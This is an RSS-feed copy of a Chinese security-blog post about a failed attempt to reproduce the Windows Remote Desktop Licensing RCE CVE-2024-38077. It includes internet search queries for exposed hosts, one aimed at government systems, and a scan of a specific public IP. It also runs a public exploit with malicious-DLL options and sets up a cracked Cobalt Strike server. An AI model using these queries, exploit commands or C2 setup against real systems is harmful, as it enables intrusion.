Windows远程桌面 on 静静的安全笔记https://ruajingjing.top/tags/windows%E8%BF%9C%E7%A8%8B%E6%A1%8C%E9%9D%A2/Recent content in Windows远程桌面 on 静静的安全笔记Hugo -- gohugo.iozh-CNThu, 15 Aug 2024 16:43:45 +0000【POC未成功控制】Windows 远程桌面授权服务远程代码执行漏洞 CVE-2024-38077 漏洞 狂躁许可(MadLicense)https://ruajingjing.top/post/windows-%E8%BF%9C%E7%A8%8B%E6%A1%8C%E9%9D%A2%E6%8E%88%E6%9D%83%E6%9C%8D%E5%8A%A1%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E-cve-2024-38077/Thu, 15 Aug 2024 16:43:45 +0000https://ruajingjing.top/post/windows-%E8%BF%9C%E7%A8%8B%E6%A1%8C%E9%9D%A2%E6%8E%88%E6%9D%83%E6%9C%8D%E5%8A%A1%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E-cve-2024-38077/<img src="https://ruajingjing.top/" alt="Featured image of post 【POC未成功控制】Windows 远程桌面授权服务远程代码执行漏洞 CVE-2024-38077 漏洞 狂躁许可(MadLicense)" /> <blockquote> <p>参考链接 <a class="link" href="https://mp.weixin.qq.com/s/MwNpG5oi72d-IooPBnI0pA" target="_blank" rel="noopener" >Windows 远程桌面授权服务远程代码执行漏洞(CVE-2024-38077)</a> <a class="link" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38077" target="_blank" rel="noopener" >Windows 远程桌面授权服务远程代码执行漏洞</a> <a class="link" href="https://mp.weixin.qq.com/s/kznwwggnbjEj1IkTzLjz2Q" target="_blank" rel="noopener" >关于Windows远程桌面许可服务存在远程代码执行漏洞的安全公告</a> <a class="link" href="https://mp.weixin.qq.com/s/va5U6LIrihJSbaE--7MBgQ" target="_blank" rel="noopener" >微软高危漏洞 CVE-2024-38077 EXP</a> <a class="link" href="https://github.com/qi4L/CVE-2024-38077" target="_blank" rel="noopener" >CVE-2024-38077-EXP</a> <a class="link" href="https://cn-sec.com/archives/3053234.html" target="_blank" rel="noopener" >漏洞预警 | 已复现】Windows 远程桌面授权服务远程代码执行漏洞(CVE-2024-38077)附POC</a></p> </blockquote> <h2 id="漏洞影响的产品和版本">漏洞影响的产品和版本 </h2><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sh" data-lang="sh"><span class="line"><span class="ln"> 1</span><span class="cl">Windows Server <span class="m">2008</span> R2 <span class="k">for</span> x64-based Systems Service Pack <span class="m">1</span> <span class="o">(</span>Server Core installation<span class="o">)</span> </span></span><span class="line"><span class="ln"> 2</span><span class="cl">Windows Server <span class="m">2008</span> R2 <span class="k">for</span> x64-based Systems Service Pack <span class="m">1</span> <span class="o">(</span>Server Core installation<span class="o">)</span> </span></span><span class="line"><span class="ln"> 3</span><span class="cl">Windows Server <span class="m">2008</span> R2 <span class="k">for</span> x64-based Systems Service Pack <span class="m">1</span> </span></span><span class="line"><span class="ln"> 4</span><span class="cl">Windows Server <span class="m">2008</span> R2 <span class="k">for</span> x64-based Systems Service Pack <span class="m">1</span> </span></span><span class="line"><span class="ln"> 5</span><span class="cl">Windows Server <span class="m">2008</span> <span class="k">for</span> x64-based Systems Service Pack <span class="m">2</span> <span class="o">(</span>Server Core installation<span class="o">)</span> </span></span><span class="line"><span class="ln"> 6</span><span class="cl">Windows Server <span class="m">2008</span> <span class="k">for</span> x64-based Systems Service Pack <span class="m">2</span> <span class="o">(</span>Server Core installation<span class="o">)</span> </span></span><span class="line"><span class="ln"> 7</span><span class="cl">Windows Server <span class="m">2008</span> <span class="k">for</span> x64-based Systems Service Pack <span class="m">2</span> </span></span><span class="line"><span class="ln"> 8</span><span class="cl">Windows Server <span class="m">2008</span> <span class="k">for</span> x64-based Systems Service Pack <span class="m">2</span> </span></span><span class="line"><span class="ln"> 9</span><span class="cl">Windows Server <span class="m">2008</span> <span class="k">for</span> 32-bit Systems Service Pack <span class="m">2</span> <span class="o">(</span>Server Core installation<span class="o">)</span> </span></span><span class="line"><span class="ln">10</span><span class="cl">Windows Server <span class="m">2008</span> <span class="k">for</span> 32-bit Systems Service Pack <span class="m">2</span> <span class="o">(</span>Server Core installation<span class="o">)</span> </span></span><span class="line"><span class="ln">11</span><span class="cl">Windows Server <span class="m">2008</span> <span class="k">for</span> 32-bit Systems Service Pack <span class="m">2</span> </span></span><span class="line"><span class="ln">12</span><span class="cl">Windows Server <span class="m">2008</span> <span class="k">for</span> 32-bit Systems Service Pack <span class="m">2</span> </span></span><span class="line"><span class="ln">13</span><span class="cl">Windows Server <span class="m">2012</span> R2 <span class="o">(</span>Server Core installation<span class="o">)</span> </span></span><span class="line"><span class="ln">14</span><span class="cl">Windows Server <span class="m">2012</span> R2 </span></span><span class="line"><span class="ln">15</span><span class="cl">Windows Server <span class="m">2012</span> <span class="o">(</span>Server Core installation<span class="o">)</span> </span></span><span class="line"><span class="ln">16</span><span class="cl">Windows Server <span class="m">2012</span> </span></span><span class="line"><span class="ln">17</span><span class="cl">Windows Server <span class="m">2016</span> <span class="o">(</span>Server Core installation<span class="o">)</span> </span></span><span class="line"><span class="ln">18</span><span class="cl">Windows Server <span class="m">2016</span> </span></span><span class="line"><span class="ln">19</span><span class="cl">Windows Server <span class="m">2019</span> <span class="o">(</span>Server Core installation<span class="o">)</span> </span></span><span class="line"><span class="ln">20</span><span class="cl">Windows Server <span class="m">2019</span> </span></span><span class="line"><span class="ln">21</span><span class="cl">Windows Server 2022, 23H2 Edition <span class="o">(</span>Server Core installation<span class="o">)</span> </span></span><span class="line"><span class="ln">22</span><span class="cl">Windows Server <span class="m">2022</span> <span class="o">(</span>Server Core installation<span class="o">)</span> </span></span><span class="line"><span class="ln">23</span><span class="cl">Windows Server <span class="m">2022</span> </span></span><span class="line"><span class="ln">24</span><span class="cl">Windows Server <span class="m">2025</span> Preview </span></span></code></pre></div><h2 id="用法">用法 </h2><h3 id="靶场搭建">靶场搭建 </h3><p>开一个普通的Windows Server 2012 R2 数据中心版 64位中文版 服务器。</p> <p>打开服务器管理器。在命令提示符(cmd)中输入 &ldquo;servermanager&rdquo; 命令打开 &ldquo;服务器管理器&rdquo;。</p> <p><img alt="1723706754157" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/1723706754157.png"></p> <p>添加角色和功能。点击 &ldquo;添加&rdquo; ,然后弹出角色和功能向导。默认点击下一步到 &ldquo;服务器角色&rdquo; 功能。添加 &ldquo;远程桌面服务&rdquo;。选择后默认下一步进行安装,直到显示 &ldquo;角色服务&rdquo; 。在这里选择 &ldquo;远程桌面授权&rdquo; ,然后点击 &ldquo;安装&rdquo; 。安装过程可能需要等待1-2分钟。</p> <p><img alt="1723706781771" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/1723706781771.png"></p> <p>安装完成后需要手动开启服务。在命令提示符(cmd)中输入 &ldquo;services.msc&rdquo; 命令,成功打开 &ldquo;服务&rdquo; 窗口,找到 &ldquo;Remote Procedure Call (RPC) Locator&rdquo; 点击开启RPC服务即可完成。</p> <p><img alt="1723706836121" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/1723706836121.png"></p> <h3 id="搜索语法">搜索语法 </h3><p>ZoomEye搜索</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sh" data-lang="sh"><span class="line"><span class="ln">1</span><span class="cl"><span class="s2">&#34;3d267954-eeb7-11d1-b94e-00c04fa3080d&#34;</span> </span></span><span class="line"><span class="ln">2</span><span class="cl"><span class="s2">&#34;3d267954-eeb7-11d1-b94e-00c04fa3080d&#34;</span> + country:<span class="s2">&#34;CN&#34;</span> </span></span></code></pre></div><p>Hunter搜索</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sh" data-lang="sh"><span class="line"><span class="ln">1</span><span class="cl">ip.ports<span class="o">=</span><span class="s2">&#34;3389&#34;</span> <span class="o">&amp;&amp;</span> ip.ports<span class="o">=</span><span class="s2">&#34;135&#34;</span> <span class="o">&amp;&amp;</span> icp.is_exception<span class="o">=</span><span class="s2">&#34;true&#34;</span> </span></span><span class="line"><span class="ln">2</span><span class="cl">ip.ports<span class="o">=</span><span class="s2">&#34;135&#34;</span><span class="o">&amp;&amp;</span>icp.is_exception<span class="o">=</span><span class="s2">&#34;true&#34;</span><span class="o">&amp;&amp;</span>icp.name<span class="o">=</span><span class="s2">&#34;政府&#34;</span> </span></span></code></pre></div><h3 id="检测">检测 </h3><p>方法一:下载深信服CVE-2024-38077漏洞扫描工具.exe,使用命令<code>.\深信服CVE-2024-38077漏洞扫描工具.exe 49.235.229.3</code> 检查目标是否存在该漏洞。</p> <p>方法二:下载利用工具<a class="link" href="https://github.com/qi4L/CVE-2024-38077" target="_blank" rel="noopener" >CVE-2024-38077-EXP</a></p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sh" data-lang="sh"><span class="line"><span class="ln">1</span><span class="cl">python CVE-2024-38077-POC.py --target_ip 靶机IP </span></span></code></pre></div><p><img alt="1723706962082" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/1723706962082.png"></p> <h3 id="利用">利用 </h3><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sh" data-lang="sh"><span class="line"><span class="ln">1</span><span class="cl">options: </span></span><span class="line"><span class="ln">2</span><span class="cl"> -h, --help show this <span class="nb">help</span> message and <span class="nb">exit</span> </span></span><span class="line"><span class="ln">3</span><span class="cl"> --target_ip TARGET_IP </span></span><span class="line"><span class="ln">4</span><span class="cl"> Target IP, eg: 192.168.120.1 </span></span><span class="line"><span class="ln">5</span><span class="cl"> --evil_ip EVIL_IP Evil IP, eg: 192.168.120.2 </span></span><span class="line"><span class="ln">6</span><span class="cl"> --evil_dll_path EVIL_DLL_PATH </span></span><span class="line"><span class="ln">7</span><span class="cl"> Evil dll path, eg: <span class="se">\s</span>mb<span class="se">\e</span>vil_dll.dll </span></span><span class="line"><span class="ln">8</span><span class="cl"> --check_vuln_exist CHECK_VULN_EXIST </span></span><span class="line"><span class="ln">9</span><span class="cl"> Check vulnerability exist before exploit </span></span></code></pre></div><p>有一个公众号复现视频模糊的背景看出似乎要CS?</p> <h3 id="cobaltstrike-client的使用">cobaltstrike-client的使用 </h3> <blockquote> <p><a class="link" href="https://blog.csdn.net/m0_73353130/article/details/131725759" target="_blank" rel="noopener" >CobaltStrike使用教程详解(基础)</a></p> </blockquote> <p>下载<a class="link" href="https://pan.baidu.com/s/1Dv1oHSBm6vNcY_YrxIWy5Q?pwd=p2n5" target="_blank" rel="noopener" >CS4.8</a>,解压密码<code>mht</code>。</p> <p>CS需要一个CS服务器,一个控制机(攻击机),被控机(靶机)。首先在CS服务器上安装java11,然后设置权限全部可执行,设置密码启动。</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sh" data-lang="sh"><span class="line"><span class="ln">1</span><span class="cl">推荐使用ubuntu18运行 </span></span><span class="line"><span class="ln">2</span><span class="cl">sudo apt install openjdk-11-jre-headless </span></span><span class="line"><span class="ln">3</span><span class="cl">sudo apt install openjdk-11-jdk </span></span><span class="line"><span class="ln">4</span><span class="cl">chmod <span class="m">777</span> teamserver </span></span><span class="line"><span class="ln">5</span><span class="cl">chmod <span class="m">777</span> TeamServerImage </span></span><span class="line"><span class="ln">6</span><span class="cl">./teamserver CS服务器公网IP passwd </span></span></code></pre></div><p><img alt="1723706599130" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/1723706599130.png"></p> <p>在控制机上cobaltstrike-client也是需要Java11才能启动。</p> <p><img alt="1723706561532" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/1723706561532.png"></p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sh" data-lang="sh"><span class="line"><span class="ln">1</span><span class="cl">java -XX:ParallelGCThreads<span class="o">=</span><span class="m">4</span> -XX:+AggressiveHeap -XX:+UseParallelGC -javaagent:uHook.jar -Dfile.encoding<span class="o">=</span>utf-8 -jar cobaltstrike-client.jar </span></span></code></pre></div><p>输入之前设置的主机ip和密码就可以,端口默认。</p> <p><img alt="1723706594296" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/1723706594296.png"></p> <p><img alt="1723710225384" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/1723710225384.png"></p> <p>执行多次不成功,看报错提示似乎还需要一个dll文件。后台翻Github发现POC仅针对2025,好好好好,这么玩是吧,什么垃圾。</p> <p><img alt="1723707633791" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/1723707633791.png"></p> <h2 id="总结评价">总结评价 </h2><p>没啥用了的噱头很大的鸡肋漏洞,漏洞本身价值很大,但是<strong>防守应急处置手段太过简单,没有沉没代价</strong>,只要封一个135端口就行,基本不影响业务。默认情况下,Windows服务器远程桌面服务仅支持两个并发会话,在启用RDP多并发会话支持时,需要手动安装RDL服务。不排除还有未更新的和未关闭端口的服务,总之是看谁手速快了。</p> <p>我现在因为复现失败很狂躁,不愧是狂躁许可(MadLicense),真是让人狂躁。</p> <p><img alt="1723709893829" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/1723709893829.png"></p>